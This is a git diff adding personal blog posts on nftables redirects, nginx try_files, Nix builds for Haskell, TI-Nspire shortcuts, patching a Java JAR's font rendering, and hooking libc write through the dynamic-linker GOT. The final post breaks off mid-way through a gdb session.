title = "nftables: redirect not working + fix"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
Recently, I made the somewhat-rash decision to switch to nftables from ufw-managed iptables on this VPS.
|
||||||
|
|
||||||
|
It's been a fun ride. The man page doesn't even document the redirect feature. It doesn't even acknowledge its existence, nor what it really does.
|
||||||
|
|
||||||
|
That's irrelevant however, because it does the same thing as the `REDIRECT` target in iptables, documented in the `iptables-extensions` man page. This allows the functionality of redirect in nftables to be inferred as "change destination address to localhost, and change the destination port to the one specified after `to`".
|
||||||
|
|
||||||
|
I, however, was a bit too dense to go looking through there and didn't read the wiki too well about redirection. I figured "hey, just need to put redirect at the start of the chain hooked into nat prerouting to enable it, then add a rule specifically redirecting the port". Later, I wondered why it wasn't working. After some tcpdump, copious quantities of counters *everywhere*, and netcat instances, I figured that out.
|
||||||
|
|
||||||
|
Note that you need to allow the packets with `dport 11113` in your filter. Your filter table will *never* see any packets on port 113 unless something has gone horribly wrong, as all of them will have `dport` changed to 11113 in the `nat` table.
|
||||||
|
|
||||||
|
If you'd like to block inbound traffic on `11113` that was not sent there by the redirect, you can use a mark: on your rule in `prerouting`, add `ct mark set 1` before the `redirect to` clause. This will set a mark on the redirected connections. Then you can only accept such marked connections with a `ct mark == 1` condition in the `filter` table.
|
||||||
|
|
||||||
|
Here's the functional config:
|
||||||
|
|
||||||
|
table ip nat {
|
||||||
|
chain prerouting {
|
||||||
|
type nat hook prerouting priority 0;
|
||||||
|
tcp dport 113 counter redirect to 11113
|
||||||
|
}
|
||||||
|
|
||||||
|
chain postrouting {
|
||||||
|
type nat hook postrouting priority 0;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
table ip6 nat {
|
||||||
|
chain prerouting {
|
||||||
|
type nat hook prerouting priority 0;
|
||||||
|
tcp dport 113 counter redirect to 11113
|
||||||
|
}
|
||||||
|
|
||||||
|
chain postrouting {
|
||||||
|
type nat hook postrouting priority 0;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
27
content/posts/nginx-try_files-troubles.md
Normal file
27
content/posts/nginx-try_files-troubles.md
Normal file
|
|
@ -0,0 +1,27 @@
|
||||||
|
+++
|
||||||
|
date = "2019-11-11"
|
||||||
|
draft = false
|
||||||
|
path = "/blog/nginx-try_files-troubles"
|
||||||
|
tags = ["nginx"]
|
||||||
|
title = "nginx: how to try multiple roots successively"
|
||||||
|
+++
|
||||||
|
|
||||||
|
As part of developing this new version of this site, I've needed to mess with nginx a lot to switch from Ghost to Gatsby, especially when related to hosting files out of multiple directories.
|
||||||
|
<!-- excerpt -->
|
||||||
|
|
||||||
|
Specifically, this site is deployed by `rsync`ing the production version of the site onto the server behind `lfcode.ca`. I want to be able to use --delete to get rid of any old files for reliability reasons (don't want to rely on stuff that's not supposed to be there accidentally). Additionally, I am hosting static files at the root of `lfcode.ca`, which I don't want to manage with Gatsby.
|
||||||
|
|
||||||
|
What this means is that I need the server to try in order:
|
||||||
|
- serve the file from the Gatsby directory
|
||||||
|
- attempt to serve it as a directory and return index.html
|
||||||
|
- serve it from the untracked static files
|
||||||
|
- 404
|
||||||
|
|
||||||
|
There are countless StackOverflow posts on this exact issue, but for various reasons, they have their own issues.
|
||||||
|
|
||||||
|
One popular suggestion is to set the `root` to some directory above both content directories then use something like `try_files dir1$uri dir1$uri/ dir2$uri =404;`. This works... nearly.
|
||||||
|
|
||||||
|
It works properly for all direct paths, but the directory functionality is broken: it sends a 301 to the browser with `dir1/subdir/`, which, once followed, 404s since the nginx server will then try to serve `dir1/dir1/subdir/index.html` which it can't find. Further, this redirection behaviour seems not to be documented anywhere.
|
||||||
|
|
||||||
|
The solution here is to just do `try_files dir1$uri dir1$uri/index.html dir2$uri =404;` and bypass the nginx index directive entirely.
|
||||||
|
|
||||||
226
content/posts/nix-and-haskell.md
Normal file
226
content/posts/nix-and-haskell.md
Normal file
|
|
@ -0,0 +1,226 @@
|
||||||
|
+++
|
||||||
|
date = "2020-07-16"
|
||||||
|
draft = false
|
||||||
|
path = "/blog/nix-and-haskell"
|
||||||
|
tags = ["nix", "haskell"]
|
||||||
|
title = "Using Nix to build multi-package, full stack Haskell apps"
|
||||||
|
+++
|
||||||
|
|
||||||
|
This post has been updated on June 16 following the finalization of the Nix
|
||||||
|
port.
|
||||||
|
|
||||||
|
As part of my job working on an [open source logic
|
||||||
|
textbook](https://carnap.io), I picked up a Haskell
|
||||||
|
codebase that was rather hard to build. This was problematic for new
|
||||||
|
contributors getting started, so I wanted to come up with a better process.
|
||||||
|
Further, because of legal requirements for public institutions in BC, I need to
|
||||||
|
be able to host this software in Canada, for which it would be useful to be
|
||||||
|
able to have CI and containerization (where it is directly useful to have an
|
||||||
|
easy to set up build environment).
|
||||||
|
|
||||||
|
The value proposition of Nix is that it ensures that regardless of who is
|
||||||
|
building the software or where it is being built, it is possible to ensure the
|
||||||
|
environment where this is done is exactly the same. It also makes it fairly
|
||||||
|
easy for users to set up that environment. Finally, it has a package *and
|
||||||
|
binaries* for GHCJS, which provides extraordinary time and effort savings by
|
||||||
|
avoiding the process of setting up dependencies for and compiling GHCJS.
|
||||||
|
|
||||||
|
A lot of the documentation around Nix is styled like programming documentation
|
||||||
|
rather than like packaging documentation, which makes it harder to figure out
|
||||||
|
where to start with packaging. For example, it is not really clear what exactly
|
||||||
|
the "correct" way to structure a multiple package Haskell project is: are you
|
||||||
|
supposed to use overlays, overrides or other methods? I chose to use overlays
|
||||||
|
based on the nixpkgs documentation's suggestions that they are the most
|
||||||
|
advanced (and thus modern?) way of putting stuff into nixpkgs.
|
||||||
|
|
||||||
|
The most significant tip I can give for doing Nix development and especially
|
||||||
|
reading other Nix package source code is that the best way of understanding
|
||||||
|
library calls is to read the nixpkgs source. This is for a couple of reasons:
|
||||||
|
for one, the user facing documentation seems to be less complete than the
|
||||||
|
documentation comments on functions, and often it is useful to read the library
|
||||||
|
function source alongside the documentation.
|
||||||
|
|
||||||
|
Usually I keep a tab in my neovim open to the nixpkgs source and use either
|
||||||
|
[nix-doc](https://github.com/lf-/nix-doc) or
|
||||||
|
[ripgrep](https://github.com/BurntSushi/ripgrep) to search for the function I
|
||||||
|
am interested in.
|
||||||
|
|
||||||
|
-----
|
||||||
|
|
||||||
|
This post summarizes the design decisions that went into implementing Nix for
|
||||||
|
this existing full stack app. If you'd like to read the source, it is
|
||||||
|
[available on GitHub](https://github.com/lf-/Carnap/tree/nix).
|
||||||
|
|
||||||
|
I have a top-level `default.nix` that imports nixpkgs with overlays for each
|
||||||
|
conceptual part of the application (this could all be done in one but it is
|
||||||
|
useful to separate them for maintenance purposes). A simplified version is
|
||||||
|
below:
|
||||||
|
|
||||||
|
```nix
|
||||||
|
{ compiler ? "ghc865",
|
||||||
|
ghcjs ? "ghcjs"
|
||||||
|
}:
|
||||||
|
let nixpkgs = import (builtins.fetchTarball {
|
||||||
|
name = "nixpkgs-20.03-2020-06-28";
|
||||||
|
url = "https://github.com/NixOS/nixpkgs/archive/f8248ab6d9e69ea9c07950d73d48807ec595e923.zip";
|
||||||
|
sha256 = "009i9j6mbq6i481088jllblgdnci105b2q4mscprdawg3knlyahk";
|
||||||
|
}) {
|
||||||
|
config = {
|
||||||
|
# Use this if you use 'broken' packages that are fixed in an overlay
|
||||||
|
allowBroken = true;
|
||||||
|
};
|
||||||
|
overlays = [
|
||||||
|
(import ./client.nix { inherit ghcjs; })
|
||||||
|
(import ./server.nix { inherit ghcjs compiler; })
|
||||||
|
];
|
||||||
|
};
|
||||||
|
in {
|
||||||
|
client = nixpkgs.haskell.packages."${ghcjs}".Client;
|
||||||
|
server = nixpkgs.haskell.packages."${compiler}".Server;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
In each Haskell package, use `cabal2nix .` to generate nix files for the
|
||||||
|
package. These nix files can then be picked up with
|
||||||
|
[`lib.callPackage`](https://github.com/NixOS/nixpkgs/blob/b63f684/lib/customisation.nix#L96-L121)
|
||||||
|
in an overlay:
|
||||||
|
|
||||||
|
```nix
|
||||||
|
{ ghcjs ? "ghcjs", compiler ? "ghc865" }:
|
||||||
|
self: super:
|
||||||
|
let overrideCabal = super.haskell.lib.overrideCabal;
|
||||||
|
in {
|
||||||
|
haskell = super.haskell // {
|
||||||
|
packages = super.haskell.packages // {
|
||||||
|
"${compiler}" = super.haskell.packages."${compiler}".override {
|
||||||
|
overrides = newpkgs: oldpkgs: {
|
||||||
|
Common1 = oldpkgs.callPackage ./Common1/Common1.nix { };
|
||||||
|
# ...
|
||||||
|
};
|
||||||
|
};
|
||||||
|
};
|
||||||
|
};
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
## Shells
|
||||||
|
|
||||||
|
You could normally use
|
||||||
|
[`nixpkgs.haskell.packages.${ghcVer}.shellFor`](https://github.com/NixOS/nixpkgs/blob/c565d7c/pkgs/development/haskell-modules/make-package-set.nix#L288)
|
||||||
|
to construct a shell. However, this is not ideal for multiple package projects
|
||||||
|
since it will invariably make Nix build some of your projects because they are
|
||||||
|
"dependencies".
|
||||||
|
|
||||||
|
There does not appear to be any built in resolution for this. However,
|
||||||
|
[reflex-platform](https://github.com/reflex-frp/reflex-platform), has
|
||||||
|
integrated a module called
|
||||||
|
[`workOnMulti`](https://github.com/reflex-frp/reflex-platform/blob/20ed151/nix-utils/work-on-multi/default.nix).
|
||||||
|
I thus took the opportunity to extricate it from its dependencies on the rest
|
||||||
|
of reflex-platform to be able to use it independently. This extracted version
|
||||||
|
is [available here](https://github.com/lf-/Carnap/blob/cde2671/nix/work-on-multi.nix).
|
||||||
|
|
||||||
|
It can be used thus:
|
||||||
|
|
||||||
|
```nix
|
||||||
|
let # import nixpkgs with overlays...
|
||||||
|
workOnMulti = import ./nix/work-on-multi.nix {
|
||||||
|
inherit nixpkgs;
|
||||||
|
# put whatever tools you want in the shell environments here
|
||||||
|
generalDevTools = _: {
|
||||||
|
inherit (nixpkgs) cabal2nix;
|
||||||
|
inherit (nixpkgs.haskell.packages."${ghcVer}")
|
||||||
|
Cabal
|
||||||
|
cabal-install
|
||||||
|
ghcid
|
||||||
|
hasktags;
|
||||||
|
};
|
||||||
|
};
|
||||||
|
in {
|
||||||
|
ghcShell = workOnMulti {
|
||||||
|
envPackages = [
|
||||||
|
"Common1"
|
||||||
|
"Common2"
|
||||||
|
"Server"
|
||||||
|
];
|
||||||
|
env = with nixpkgs.haskell.packages."${ghcVer}"; {
|
||||||
|
# enable hoogle in the environment
|
||||||
|
ghc = ghc.override {
|
||||||
|
override = self: super: {
|
||||||
|
withPackages = super.ghc.withHoogle;
|
||||||
|
};
|
||||||
|
};
|
||||||
|
inherit Common1 Common2 Server mkDerivation;
|
||||||
|
};
|
||||||
|
};
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
Then, you can use `nix-shell` with this attribute: `nix-shell -A ghcShell`.
|
||||||
|
|
||||||
|
Build with Cabal as usual (`cabal new-build all`), assuming you've built the
|
||||||
|
GHCJS parts already (see below).
|
||||||
|
|
||||||
|
## GHCJS
|
||||||
|
|
||||||
|
GHCJS breaks many unit tests such that they freeze the Nix build process. You
|
||||||
|
can override `mkDerivation` to disable most packages' unit tests. For some,
|
||||||
|
this does not work because nixpkgs puts test runs in a conditional already,
|
||||||
|
which causes the `mkDerivation` override to be ignored.
|
||||||
|
[`haskell.lib.dontCheck`](https://github.com/NixOS/nixpkgs/blob/32c8e79/pkgs/development/haskell-modules/lib.nix#L106-L109)
|
||||||
|
can be used to deal with these cases.
|
||||||
|
|
||||||
|
```nix
|
||||||
|
# inside the config.packageOverrides.haskell.packages.${compiler}.override call
|
||||||
|
mkDerivation = args: super.mkDerivation (args // {
|
||||||
|
doCheck = false;
|
||||||
|
enableLibraryProfiling = false;
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
To integrate the GHCJS-built browser side code with the rest of the project, a
|
||||||
|
[method inspired by
|
||||||
|
reflex-platform](https://github.com/reflex-frp/reflex-platform/blob/6ce4607/docs/project-development.rst)
|
||||||
|
is used. Namely, `nix-build -o client-out -A client` is used to build the
|
||||||
|
client and put a symbolic link in a known place, then manually created symbolic links are
|
||||||
|
placed in the static folder pointing back into this client output link.
|
||||||
|
|
||||||
|
For package builds, a [`preConfigure` script](https://github.com/lf-/Carnap/blob/cde2671/server.nix#L30-L36)
|
||||||
|
is used with
|
||||||
|
[`haskell.lib.overrideCabal`](https://github.com/NixOS/nixpkgs/blob/32c8e79/pkgs/development/haskell-modules/lib.nix#L11-L41)
|
||||||
|
to replace these links with paths in the Nix store for the browser JavaScript.
|
||||||
|
A dependency on the built JavaScript is also added so it gets pulled in.
|
||||||
|
|
||||||
|
## Custom dependencies
|
||||||
|
|
||||||
|
Larger projects have a higher likelihood of having dependencies on Hackage
|
||||||
|
packages that are not in nixpkgs, or absolutely need to be a specific version.
|
||||||
|
It's easy to integrate these into the nix project using `cabal2nix`:
|
||||||
|
|
||||||
|
```
|
||||||
|
$ cabal2nix cabal://your-package-0.1.0.0 | tee nix/your-package.nix
|
||||||
|
```
|
||||||
|
|
||||||
|
These can then be integrated into the project by using
|
||||||
|
[`lib.callPackage`](https://github.com/NixOS/nixpkgs/blob/b63f684/lib/customisation.nix#L96-L121).
|
||||||
|
|
||||||
|
While it is also possible to use
|
||||||
|
[`callCabal2nix`](https://github.com/NixOS/nixpkgs/blob/f5b6ea1/pkgs/development/haskell-modules/make-package-set.nix#L200-L216),
|
||||||
|
I choose not to for reasons of initial build performance and reproducibility:
|
||||||
|
`cabal2nix` is not fast, and inadvertent updates could happen when updates are
|
||||||
|
made on the Hackage side, whereas checking in `cabal2nix` output ensures that
|
||||||
|
exactly the same package is used.
|
||||||
|
|
||||||
|
## Final thoughts
|
||||||
|
|
||||||
|
This project was very stimulating and challenging, and I learned a lot about
|
||||||
|
both my own learning process for new complex technologies and the technologies
|
||||||
|
themselves. Throughout this process, for the first time, I treated learning a
|
||||||
|
new technology like class material and read the documentation from top to
|
||||||
|
bottom, taking notes on the useful parts. This made it easier to keep the
|
||||||
|
unfamiliar language behaviour in mind while simultaneously reading code.
|
||||||
|
|
||||||
|
I will use *this* strategy again because although it is slightly slower, it
|
||||||
|
seemed to result in fewer trips to Google to check things and generally better
|
||||||
|
comprehension.
|
||||||
|
|
||||||
42
content/posts/nspirations-on-getting-math-done-faster.md
Normal file
42
content/posts/nspirations-on-getting-math-done-faster.md
Normal file
|
|
@ -0,0 +1,42 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
categories = ["nspire", "school", "software"]
|
||||||
|
date = 2019-04-16T23:50:00Z
|
||||||
|
description = ""
|
||||||
|
draft = false
|
||||||
|
path = "/blog/nspirations-on-getting-math-done-faster"
|
||||||
|
tags = ["nspire", "school", "software"]
|
||||||
|
title = "Nspirations on getting math done faster"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
I enjoy math so much that my primary goal is to get it done as quickly as possible. In more practical terms, the better I can get stuff done on my Nspire, potentially the higher score I can get on the AP exams \[later note: it was successful\]. <!-- excerpt -->
|
||||||
|
|
||||||
|
The Nspire is not *un*documented, just that the documentation is very well hidden. It's also not sorted by how often you might use something.
|
||||||
|
|
||||||
|
## Ctrl shortcuts
|
||||||
|
The fastest way to enter stuff is either by memorizing the menu numbers (you can press the number key which shows up on a menu to go straight to it), though that often puts you in a dialog box, or by typing it in. Unfortunately, typing stuff in is not always easy and there are many characters which seem to have no way to be typed other than by selecting them from the library or in the character list.
|
||||||
|
|
||||||
|
The most significant ones are the `\` (shift-divide) and the `_` (ctrl-space). The backslash is useful for libraries, for example: `ch\mm`, and the underscore is useful for annotating units, but I use it mostly for getting the constants such as `_Rc` (8.31 J/g·°C) and `_nA` (Avogadro's number).
|
||||||
|
|
||||||
|
Many of the usual shortcuts as you might use on a computer are also available on the Nspire, for instance, Ctrl-C, Ctrl-V, Ctrl-X, Ctrl-A (specifically with this one, I like to enter square roots as typing the inside, Ctrl-A, then the square root button). Selection can be done by shift-arrows or with the cursor as follows (note: works on computers too, awesome for copying an entire page): click the mouse where you want to start a selection, then shift click where you want the end.
|
||||||
|
|
||||||
|
For Calculus, some of the most important shortcuts are Shift-plus and Shift-minus, which are the integral and the derivative. One way to remember these is to think of what evaluating the given thing would do to the exponents in a polynomial. Integrals increase these exponents, and derivatives decrease them.
|
||||||
|
|
||||||
|
If there's anything you should take away from this post though, it's the cursor navigation shortcuts! They are in the same arrangement as you would see on a computer numpad. That is to say, Ctrl-1 is home, Ctrl-7 is end, Ctrl-9 is Page Up and Ctrl-3 is Page Down.
|
||||||
|
|
||||||
|
## Graph environment
|
||||||
|
The most interesting thing about the graph environment is what I call the right click, which brings up the context menu for whatever is under the cursor (Ctrl-Menu). From this, you can access recent commands and other stuff:
|
||||||
|
|
||||||
|
{% image(name = "Annotation-2019-04-16-172723.png") %}
|
||||||
|
Screenshot of the TI-Nspire user interface showing a graph inside a document.
|
||||||
|
|
||||||
|
It shows a context menu with a numbered list of options including "Recent" for recent commands, "Attributes", "Hide", "Delete", and "Edit Relation" among others.
|
||||||
|
{% end %}
|
||||||
|
|
||||||
|
To do stuff precisely, for example when you are finding an integral between 0 and 2, you select the integral command, then type 0 on the keyboard, press Enter, then press 2, then Enter.
|
||||||
|
|
||||||
|
To get the precise coordinate of some point, for example an intersection, click once on the text of the coordinate you want to store, press Ctrl-Var (sto->), and it will give something like `var := 123.45`. Enter the variable name you want, and press enter. You can then access the information about that variable in the right click menu of the text.
|
||||||
|
|
||||||
|
If that point doesn't yet have coordinates displayed, for instance if you placed it from the geometry environment and you need to move it to some precise position, you can give it some by clicking on the point, then using the right click menu and selecting "Coordinates and Equations".
|
||||||
|
|
||||||
129
content/posts/patching-jars-aa.md
Normal file
129
content/posts/patching-jars-aa.md
Normal file
|
|
@ -0,0 +1,129 @@
|
||||||
|
+++
|
||||||
|
date = "2020-11-11"
|
||||||
|
draft = false
|
||||||
|
path = "/blog/patching-jars-aa"
|
||||||
|
tags = ["reverse-engineering"]
|
||||||
|
title = "How to patch Java font rendering for AA"
|
||||||
|
+++
|
||||||
|
|
||||||
|
{{ image(name="jar-pre.png", alt="Screenshot of the software displaying disassembly of ARM instructions. The font is both very small and shows significant aliasing artifacts, making it hard to read") }}
|
||||||
|
|
||||||
|
This post was inspired by a *hypothetical* closed source piece of software from
|
||||||
|
a hardware vendor, written in Java, which has unusable font rendering that
|
||||||
|
makes it inaccessible for me, but I need to use it for class, so what am I to
|
||||||
|
do? I want to write evil `LD_PRELOAD` hacks but it's probably easier to patch
|
||||||
|
the program itself, so that's what we're going to do.
|
||||||
|
|
||||||
|
I use IntelliJ IDEA for my Java work. It includes quite a nice Java decompiler,
|
||||||
|
which is (probably) intentionally not exposed to the user in its full
|
||||||
|
functionality, but includes a main class that lets us access it anyway.
|
||||||
|
|
||||||
|
First, make an IntelliJ project for your sources. Include all the libraries
|
||||||
|
that they depend on. Now, time for some mild reversing!
|
||||||
|
|
||||||
|
Decompile the bad JAR file ([hat tip to
|
||||||
|
StackOverflow](https://stackoverflow.com/q/28389006)):
|
||||||
|
|
||||||
|
```
|
||||||
|
PS> $p = 'C:\Program Files\JetBrains\IntelliJ IDEA Community Edition 2020.2.1\plugins\java-decompiler\lib\java-decompiler.jar'
|
||||||
|
PS> mkdir decomp
|
||||||
|
PS> java -cp $p org.jetbrains.java.decompiler.main.decompiler.ConsoleDecompiler .\ProblemProgram.jar decomp
|
||||||
|
```
|
||||||
|
|
||||||
|
Then, you will get a source JAR with all the sources in it. You can just unzip
|
||||||
|
this with whatever tool you prefer:
|
||||||
|
|
||||||
|
```
|
||||||
|
PS> Expand-Archive decomp/ProblemProgram.jar -dest src
|
||||||
|
```
|
||||||
|
|
||||||
|
You should have all the files in your source directory and can work on them!
|
||||||
|
|
||||||
|
There are probably a pile of compile errors, because decompilers aren't
|
||||||
|
perfect. They are, however, likely fairly easy to fix to convince the project
|
||||||
|
to build. In the tool I patched, it was primarily mysteriously inserted
|
||||||
|
redefinitions and `javac` getting confused about generics.
|
||||||
|
|
||||||
|
### Time to patch!
|
||||||
|
|
||||||
|
Classes that you are looking for are subclassing `JPanel` or similar AWT
|
||||||
|
classes. They should have a `setFont` call you can patch, and an implementation
|
||||||
|
of `paint(Graphics)`. First, patch the `setFont` in the sources to use a better
|
||||||
|
font (because their choice is probably not good):
|
||||||
|
|
||||||
|
```java
|
||||||
|
this.setFont(new Font("Iosevka", 0, 14));
|
||||||
|
```
|
||||||
|
|
||||||
|
Then, for the magic incantations to patch the actual rendering ([thanks again,
|
||||||
|
StackOverflow](https://stackoverflow.com/a/31537742)):
|
||||||
|
|
||||||
|
```java
|
||||||
|
// at the top of the file
|
||||||
|
import java.awt.Graphics2D;
|
||||||
|
import java.awt.RenderingHints;
|
||||||
|
|
||||||
|
// in paint(Graphics g)
|
||||||
|
((Graphics2D) g).setRenderingHint(RenderingHints.KEY_TEXT_ANTIALIASING, RenderingHints.VALUE_TEXT_ANTIALIAS_LCD_HRGB);
|
||||||
|
```
|
||||||
|
|
||||||
|
This enables subpixel antialiasing (which is superior to the default
|
||||||
|
antialiasing type that ends up rather blurry).
|
||||||
|
|
||||||
|
Recompile, and you can do the final stage of patching:
|
||||||
|
|
||||||
|
### Reincorporating the patches
|
||||||
|
|
||||||
|
You can use the `jar` tool included with your Java Development Kit to update
|
||||||
|
the file. Note that the path to the class file must have the package name at
|
||||||
|
its base:
|
||||||
|
|
||||||
|
```
|
||||||
|
# Make a backup!!
|
||||||
|
PS> cp ProblemProgram.jar ProblemProgram-orig.jar
|
||||||
|
# Patch it!
|
||||||
|
PS> jar uf ../ProblemProgram.jar com/problemcompany/problemprogram/UI.class
|
||||||
|
```
|
||||||
|
|
||||||
|
We replace only the class that is causing us problems to reduce exposure to
|
||||||
|
anything bad that happened in the round trip through the decompiler.
|
||||||
|
|
||||||
|
Now, for the result:
|
||||||
|
|
||||||
|
{{ image(alt="program showing a disassembly view with properly smooth fonts, in contrast to
|
||||||
|
the header image with pixelated and unreadable fonts", name="jar-post.png") }}
|
||||||
|
|
||||||
|
### Bonus fun
|
||||||
|
|
||||||
|
Font rendering may not be the only thing wrong with this closed source program,
|
||||||
|
and you have to figure out some weird behaviours or find a configuration file.
|
||||||
|
A debugger can be fantastically useful for this purpose. IntelliJ provides
|
||||||
|
quite a smooth experience at debugging closed source code.
|
||||||
|
|
||||||
|
If you don't want to commit to fixing any decompilation errors, you can add the
|
||||||
|
program's JAR as a library in `File>Project Structure` in IDEA, and it will let
|
||||||
|
you set breakpoints in arbitrary class files without having to decompile and
|
||||||
|
recompile them.
|
||||||
|
|
||||||
|
Run the program with a similar Java command to this:
|
||||||
|
|
||||||
|
```
|
||||||
|
PS> java '-agentlib:jdwp=transport=dt_socket,address=127.0.0.1:5678,server=y,suspend=y' -jar C:\ThatVendor\ProblematicProgram.jar
|
||||||
|
```
|
||||||
|
|
||||||
|
{% image(name="jar-configs.png") %}
|
||||||
|
Run/Debug Configurations window in IntelliJ IDEA with a remote configuration on port 5678, host localhost, debugger mode "Attach to Remote JVM", transport "Socket"
|
||||||
|
{% end %}
|
||||||
|
|
||||||
|
Once you have the configuration set up in IDEA, you can click the "Debug"
|
||||||
|
button and it will connect to your JVM and start running the remote program.
|
||||||
|
|
||||||
|
### In case we're thinking of the same program from a blue FPGA vendor
|
||||||
|
|
||||||
|
`Monitor_Program/amp.config` has a setting `debug yes` to enable a debug
|
||||||
|
console, though it doesn't have much of interest in it.
|
||||||
|
|
||||||
|
`monitor.properties` has a setting `YOURUSERNAME-enable-source-level-debugging`
|
||||||
|
that, if disabled, as it seems to have done to itself initially, it disables
|
||||||
|
all the file related functionality in the program, which is quite confusing
|
||||||
|
indeed (and was the reason I first got out the decompiler).
|
||||||
237
content/posts/pwintln-uwu.md
Normal file
237
content/posts/pwintln-uwu.md
Normal file
|
|
@ -0,0 +1,237 @@
|
||||||
|
+++
|
||||||
|
date = "2020-11-21"
|
||||||
|
draft = false
|
||||||
|
path = "/blog/pwintln-uwu"
|
||||||
|
tags = ["rust", "linux"]
|
||||||
|
title = "pwintln uwu and other fun with elves and dynamic linkers"
|
||||||
|
+++
|
||||||
|
|
||||||
|
I recently was [brutally
|
||||||
|
nerdsniped](https://twitter.com/The6P4C/status/1329725624412381185) into
|
||||||
|
developing a [strange Rust library that turns prints into
|
||||||
|
uwu-speak](https://crates.io/crates/pwintln). I briefly considered writing a
|
||||||
|
proc macro but that was far too memory safe. It's doing-bad-things-to-binaries
|
||||||
|
time! (followed shortly by uwu time~!!)
|
||||||
|
|
||||||
|
I am going to use Linux because it's the platform I'm most comfortable doing
|
||||||
|
terrible things to.
|
||||||
|
|
||||||
|
I thought of a few strategies including inserting a breakpoint on the
|
||||||
|
`write(2)` routine in libc, but I figured I'd have to get the symbol anyway, so
|
||||||
|
messing with dynamic linking is probably the best strategy.
|
||||||
|
|
||||||
|
The way that dynamically linked symbols are handled *on my machine* for my Rust
|
||||||
|
executables is primarily through the `.rela.dyn` section. What this table
|
||||||
|
actually stores is the offsets from the base of the process image for function
|
||||||
|
pointers that are called indirectly when actually calling the function:
|
||||||
|
|
||||||
|
```
|
||||||
|
(gdb) si
|
||||||
|
0x000055555558126e 9 unsafe { libc::write(1, s.as_ptr() as *const c_void, s.to_bytes().len()) };
|
||||||
|
0x0000555555581267 <_ZN7pwintln4main17hef045d1a4d1daed3E+23>: 48 8d 35 ea 7d 0e 00 lea rsi,[rip+0xe7dea] # 0x5
|
||||||
|
55555669058
|
||||||
|
=> 0x000055555558126e <_ZN7pwintln4main17hef045d1a4d1daed3E+30>: ba 14 00 00 00 mov edx,0x14
|
||||||
|
0x0000555555581273 <_ZN7pwintln4main17hef045d1a4d1daed3E+35>: bf 01 00 00 00 mov edi,0x1
|
||||||
|
0x0000555555581278 <_ZN7pwintln4main17hef045d1a4d1daed3E+40>: ff 15 72 5c 17 00 call QWORD PTR [rip+0x175c72]
|
||||||
|
# 0x5555556f6ef0
|
||||||
|
```
|
||||||
|
|
||||||
|
This form of the call instruction, for those who are unfamiliar, dereferences
|
||||||
|
the pointer `[rip + 0x175c72]` then calls the resulting address. So, if we want
|
||||||
|
to redirect execution, we can replace the address in memory at `0x5555556f6ef0`
|
||||||
|
with a pointer to our own function!
|
||||||
|
|
||||||
|
The way the dynamic linker knows where to put this pointer is by looking it up
|
||||||
|
in the relocations table, which you can see with `readelf -r`. In particular,
|
||||||
|
we find that `0x0x5555556f6ef0 = PROG_BASE + 0x1a2ef0`.
|
||||||
|
|
||||||
|
```
|
||||||
|
dev/pwintln » readelf -r target/release/pwintln
|
||||||
|
Relocation section '.rela.dyn' at offset 0x11a0 contains 7458 entries:
|
||||||
|
Offset Info Type Sym. Value Sym. Name + Addend
|
||||||
|
00000017e9c0 000000000008 R_X86_64_RELATIVE f94e0
|
||||||
|
00000017e9c8 000000000008 R_X86_64_RELATIVE 2d160
|
||||||
|
00000017e9d0 000000000008 R_X86_64_RELATIVE 2d110
|
||||||
|
< ... ... ... ... ... ... >
|
||||||
|
0000001a2ea8 004400000006 R_X86_64_GLOB_DAT 0000000000000000 pthread_mutexattr_init@GLIBC_2.2.5 + 0
|
||||||
|
0000001a2ec0 004500000006 R_X86_64_GLOB_DAT 0000000000000000 pthread_key_create@GLIBC_2.2.5 + 0
|
||||||
|
0000001a2ee8 004600000006 R_X86_64_GLOB_DAT 0000000000000000 pthread_mutex_destroy@GLIBC_2.2.5 + 0
|
||||||
|
0000001a2ef0 004700000006 R_X86_64_GLOB_DAT 0000000000000000 write@GLIBC_2.2.5 + 0
|
||||||
|
0000001a2f28 004900000006 R_X86_64_GLOB_DAT 0000000000000000 sigaltstack@GLIBC_2.2.5 + 0
|
||||||
|
0000001a2f40 004a00000006 R_X86_64_GLOB_DAT 0000000000000000 pthread_mutex_unlock@GLIBC_2.2.5 + 0
|
||||||
|
0000001a2f48 004b00000006 R_X86_64_GLOB_DAT 0000000000000000 memcpy@GLIBC_2.14 + 0
|
||||||
|
0000001a2f68 004c00000006 R_X86_64_GLOB_DAT 0000000000000000 open@GLIBC_2.2.5 + 0
|
||||||
|
0000001a2f88 004d00000006 R_X86_64_GLOB_DAT 0000000000000000 mmap@GLIBC_2.2.5 + 0
|
||||||
|
0000001a2f98 004e00000006 R_X86_64_GLOB_DAT 0000000000000000 _Unwind_SetIP@GCC_3.0 + 0
|
||||||
|
|
||||||
|
Relocation section '.rela.plt' at offset 0x2ccd0 contains 4 entries:
|
||||||
|
Offset Info Type Sym. Value Sym. Name + Addend
|
||||||
|
0000001a11d8 001000000007 R_X86_64_JUMP_SLO 0000000000000000 __register_atfork@GLIBC_2.3.2 + 0
|
||||||
|
0000001a11e0 001900000007 R_X86_64_JUMP_SLO 0000000000000000 __fxstat64@GLIBC_2.2.5 + 0
|
||||||
|
0000001a11e8 002300000007 R_X86_64_JUMP_SLO 0000000000000000 __tls_get_addr@GLIBC_2.3 + 0
|
||||||
|
0000001a11f0 004800000007 R_X86_64_JUMP_SLO 0000000000000000 _Unwind_Resume@GCC_3.0 + 0
|
||||||
|
```
|
||||||
|
|
||||||
|
Here, we show the process of poking at the symbol in a different way: first, we
|
||||||
|
get the program base with `info proc mappings` (the first line). Then, we look
|
||||||
|
at the memory at `PROG_BASE + 0x1a1ef0`, then interpret the quad-word we find
|
||||||
|
there as a pointer, dereferencing it and looking at the disassembly at its
|
||||||
|
target. We find libc code for `write(2)` here!
|
||||||
|
|
||||||
|
```
|
||||||
|
dev/pwintln » gdb target/release/pwintln
|
||||||
|
(gdb) info proc map
|
||||||
|
process 26676
|
||||||
|
Mapped address spaces:
|
||||||
|
|
||||||
|
